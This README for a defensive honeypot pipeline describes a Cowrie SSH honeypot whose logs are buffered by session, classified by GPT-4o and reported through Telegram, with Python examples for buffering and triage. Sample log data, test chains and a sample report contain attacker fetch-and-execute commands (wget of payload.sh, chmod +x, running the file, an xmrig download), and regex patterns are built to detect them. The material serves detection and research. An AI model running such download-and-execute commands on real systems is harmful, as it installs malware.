An autonomous threat intelligence pipeline that captures SSH brute-force attacks via a Dockerized honeypot, analyzes attacker intent with AI, and delivers real-time threat reports through Telegram.
Sentinel goes beyond simple logging. By combining a high-interaction SSH honeypot with an AI analyst and session-based log buffering, it transforms raw attack data into actionable security intelligence — identifying attacker intent, categorizing attack patterns, and delivering structured reports in real-time.
```text
┌──────────┐    SSH     ┌─────────────────────┐
│ Attacker │ ─────────► │   AWS EC2 Instance  │
└──────────┘            │ ┌─────────────────┐ │
                        │ │ Cowrie Honeypot │ │
                        │ │    (Docker)     │ │
                        │ └────────┬────────┘ │
                        │          │ logs     │
                        │ ┌────────▼────────┐ │
                        │ │ Python Monitor  │ │
                        │ │  (Edge Buffer)  │ │
                        │ └────────┬────────┘ │
                        └──────────┼──────────┘
                                   │ aggregated payload
                          ┌────────▼────────┐
                          │   n8n Webhook   │
                          │        │        │
                          │   ┌────▼─────┐  │
                          │   │  OpenAI  │  │
                          │   │  GPT-4o  │  │
                          │   └────┬─────┘  │
                          └────────┼────────┘
                                   │ threat report
                          ┌────────▼────────┐
                          │ Telegram Alert  │
                          └─────────────────┘
```
Dockerized Cowrie SSH/Telnet simulator deployed on AWS EC2. Captures keystrokes, command history, downloaded files, and session metadata in an isolated environment.
Instead of sending every log line to the cloud (which caused API costs to explode during brute-force attacks, since each failed login produced its own API call), the Python monitor aggregates logs locally by Session ID and waits for a 120-second idle period before transmitting one payload per session.
Result: ~95% reduction in API calls, while the AI still receives the full context of each attack session.
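The session-based edge buffering described above, as an added example that is not the project's own `log-monitor.py`: Cowrie events are grouped by their `session` field and a session is only emitted once it has been idle for 120 seconds, so a brute-force run of hundreds of login events becomes a single webhook call. The Cowrie JSON field names used (`session`, `eventid`, `src_ip`, `timestamp`, `input`) are real Cowrie log fields; the sample log lines, the `example.invalid` URL and the webhook transport are constructed for this example.

```python
"""Session-based edge buffer for Cowrie JSON logs (added example)."""
import json
import os
import urllib.request
from datetime import datetime

IDLE_SECONDS = 120  # idle period before a session is flushed, as in the README

# Constructed sample of Cowrie's JSON log output: one interactive session
# and one login-only brute-force session, plus a non-JSON line to skip.
SAMPLE_LOG = [
    '{"eventid":"cowrie.session.connect","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","timestamp":"2024-01-01T10:00:00.000000Z"}',
    '{"eventid":"cowrie.login.success","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","username":"root","password":"123456","timestamp":"2024-01-01T10:00:02.000000Z"}',
    '{"eventid":"cowrie.command.input","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","input":"wget http://example.invalid/payload.sh","timestamp":"2024-01-01T10:00:10.000000Z"}',
    '{"eventid":"cowrie.command.input","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","input":"chmod +x payload.sh","timestamp":"2024-01-01T10:00:20.000000Z"}',
    '{"eventid":"cowrie.session.closed","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","timestamp":"2024-01-01T10:00:45.000000Z"}',
    '{"eventid":"cowrie.login.failed","session":"ffff00001111","src_ip":"198.51.100.9","timestamp":"2024-01-01T10:02:00.000000Z"}',
    "not json at all",
]


def parse_ts(ts: str) -> float:
    """Cowrie writes ISO-8601 UTC timestamps with a trailing 'Z'."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00")).timestamp()


class SessionBuffer:
    """Accumulates events per Cowrie session until the session goes idle."""

    def __init__(self, idle_seconds: int = IDLE_SECONDS):
        self.idle_seconds = idle_seconds
        self.sessions: dict[str, dict] = {}

    def ingest(self, line: str) -> None:
        """Add one log line to its session bucket; non-JSON lines are ignored."""
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            return
        sid = ev.get("session")
        if not sid:
            return
        ts = parse_ts(ev["timestamp"])
        s = self.sessions.setdefault(sid, {
            "session": sid, "src_ip": ev.get("src_ip"),
            "first_seen": ts, "last_seen": ts, "events": 0, "commands": [],
        })
        s["last_seen"] = max(s["last_seen"], ts)
        s["events"] += 1
        if ev.get("eventid") == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))

    def flush_idle(self, now: float) -> list[dict]:
        """Return (and drop) one aggregated payload per session idle >= idle_seconds."""
        done = [sid for sid, s in self.sessions.items()
                if now - s["last_seen"] >= self.idle_seconds]
        payloads = []
        for sid in done:
            s = self.sessions.pop(sid)
            payloads.append({
                "session": s["session"],
                "src_ip": s["src_ip"],
                "duration_seconds": round(s["last_seen"] - s["first_seen"]),
                "event_count": s["events"],
                "commands": s["commands"],
            })
        return payloads


def post_payload(payload: dict, webhook_url: str) -> int:
    """POST one aggregated session to the n8n webhook; returns the HTTP status."""
    req = urllib.request.Request(
        webhook_url, data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def demo() -> tuple[list[dict], int]:
    """Feed the constructed log, then check the buffer 50 s after the last event."""
    buf = SessionBuffer()
    for line in SAMPLE_LOG:
        buf.ingest(line)
    now = parse_ts("2024-01-01T10:02:50.000000Z")
    flushed = buf.flush_idle(now)   # the 45 s session is idle 125 s -> flushed
    return flushed, len(buf.sessions)  # the brute-force session is still pending


if __name__ == "__main__":
    flushed, pending = demo()
    print(json.dumps(flushed, indent=2), f"pending sessions: {pending}")
    url = os.environ.get("N8N_WEBHOOK_URL")  # assumed variable name, from .env
    if url:
        for p in flushed:
            print("webhook status:", post_payload(p, url))
```

In a real deployment `ingest` would be fed from a tail of Cowrie's JSON log and `flush_idle` called on a timer; the point of the design is that the flush decision is made per session, not per line, so the API call count scales with the number of attacker sessions rather than with the number of login attempts.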
An integrated OpenAI agent (GPT-4o) analyzes command chains to:
- Categorize attack type (Brute-force, Reconnaissance, Crypto-mining, Botnet Injection)
- Identify critical commands (`wget`, `chmod +x`, `mkdir`)
- Filter automated noise to focus on sophisticated intrusion attempts
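A deterministic first pass over an aggregated session's command chain, added here as an example and not the project's n8n workflow or its OpenAI prompt: it tags the critical commands the README lists (`wget`, `chmod +x`, `mkdir`), assigns one of the README's four categories where the evidence is clear, and decides whether the session deserves an AI call at all, so login-only noise never reaches the API. The regexes, the extra indicators (`curl`, `./file`, miner names, recon commands) and the escalation threshold are assumptions chosen for this example.

```python
"""Pre-AI triage of a honeypot session's command chain (added example)."""
import re

# Critical-command patterns: the README's wget / chmod +x / mkdir plus two
# common staging indicators (curl download, running a freshly dropped file).
CRITICAL_PATTERNS = {
    "download":        re.compile(r"\b(wget|curl)\b"),
    "make_executable": re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b"),
    "staging_dir":     re.compile(r"\bmkdir\b"),
    "run_local_file":  re.compile(r"(^|[;&|]\s*)\./\S+"),
}
# Assumed hints for the Crypto-mining category (miner binaries / pool protocol).
MINING_HINTS = re.compile(r"xmrig|minerd|stratum\+tcp|cryptonight", re.IGNORECASE)
# Assumed reconnaissance indicators: host-enumeration commands and files.
RECON_FIRST_TOKENS = {"uname", "whoami", "id", "nproc", "lscpu", "ifconfig", "ps", "w"}
RECON_PATHS = ("/proc/cpuinfo", "/etc/passwd", "/etc/os-release")
RECON_ESCALATE_MIN = 3  # assumed: recon-only sessions need >= 3 commands to matter


def tag_command(cmd: str) -> list[str]:
    """Names of every critical pattern that matches one shell command."""
    return [name for name, pat in CRITICAL_PATTERNS.items() if pat.search(cmd)]


def is_recon(cmd: str) -> bool:
    """True if the command looks like host enumeration."""
    stripped = cmd.strip()
    first = stripped.split(" ", 1)[0] if stripped else ""
    return first in RECON_FIRST_TOKENS or any(p in cmd for p in RECON_PATHS)


def triage(commands: list[str]) -> dict:
    """Categorize a session's command chain and decide whether to escalate to AI.

    `commands` is the ordered list of cowrie.command.input values for one
    session; an empty list means the attacker never got past the login prompt.
    """
    critical = []
    tags_seen: set[str] = set()
    for cmd in commands:
        tags = tag_command(cmd)
        if tags:
            critical.append({"command": cmd, "tags": tags})
            tags_seen.update(tags)
    mining = any(MINING_HINTS.search(c) for c in commands)
    recon_count = sum(1 for c in commands if is_recon(c))

    if not commands:
        category = "Brute-force"          # credential guessing only
    elif mining:
        category = "Crypto-mining"
    elif "download" in tags_seen and ({"make_executable", "run_local_file"} & tags_seen):
        category = "Botnet Injection"     # fetch -> make executable / run
    elif recon_count and not critical:
        category = "Reconnaissance"
    else:
        category = "Unclassified"         # leave the final call to the AI analyst

    # Escalate anything with a critical command or miner, or deep recon; drop the rest.
    escalate = (category in ("Crypto-mining", "Botnet Injection")
                or bool(critical)
                or recon_count >= RECON_ESCALATE_MIN)
    return {"category": category, "critical_commands": critical,
            "recon_commands": recon_count, "escalate": escalate}


if __name__ == "__main__":
    # Constructed command chains; the URL host is a reserved example name.
    for chain in (
        ["wget http://example.invalid/payload.sh", "chmod +x payload.sh", "./payload.sh"],
        [],
        ["uname -a", "whoami"],
        ["wget http://example.invalid/xmrig.tar.gz"],
    ):
        print(chain, "->", triage(chain))
```

The classifier is intentionally conservative: it only uses the four README categories when the evidence is unambiguous and otherwise marks the session `Unclassified` but still escalates it if a critical command is present, so the AI analysis is spent on sessions that actually ran something.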
Structured threat reports delivered instantly via Telegram with attacker IP, geolocation, session duration, event count, and AI-generated intent analysis.
```text
Attacker IP: 192.168.x.x
Origin: Brazil (BR)
Session Duration: 45 Seconds
Events Recorded: 12 Actions
Critical Command: wget http://malicious-site/payload.sh
AI Analysis: The attacker connected from a known botnet IP range.
They attempted to download a malicious payload and changed file
permissions with chmod +x. This matches Mirai Botnet variant behavior.
```
```text
cloud-honeypot/
├── src/
│   └── log-monitor.py          # Edge buffering engine + webhook transmission
├── workflows/
│   └── sentinel_workflow.json  # n8n automation (Webhook → OpenAI → Telegram)
├── assets/                     # Documentation screenshots
├── .env.example                # Environment variable template
├── requirements.txt            # Python dependencies
└── README.md
```
- AWS EC2 instance (Ubuntu/Linux)
- Docker & Docker Compose
- n8n Cloud account (or self-hosted)
- OpenAI API key
- Telegram Bot token + Chat ID
```bash
cd deployment
docker-compose up -d
cp .env.example .env
nano .env                        # add your n8n Webhook URL
pip install -r requirements.txt
python src/log-monitor.py
```
| Component | Screenshot |
|---|---|
| AI-Generated Threat Report (Telegram) | ![]() |
| n8n Automation Workflow | ![]() |
| Real-Time Terminal Monitoring | ![]() |
For educational and research purposes only. This system captures real-time data including IP addresses and command logs. Collected data is processed via third-party services (n8n, OpenAI). Users must ensure compliance with local data privacy regulations (GDPR, KVKK). Do not use this system to process PII or sensitive corporate data.
GitHub: sedat4ras | Email: sudo@sedataras.com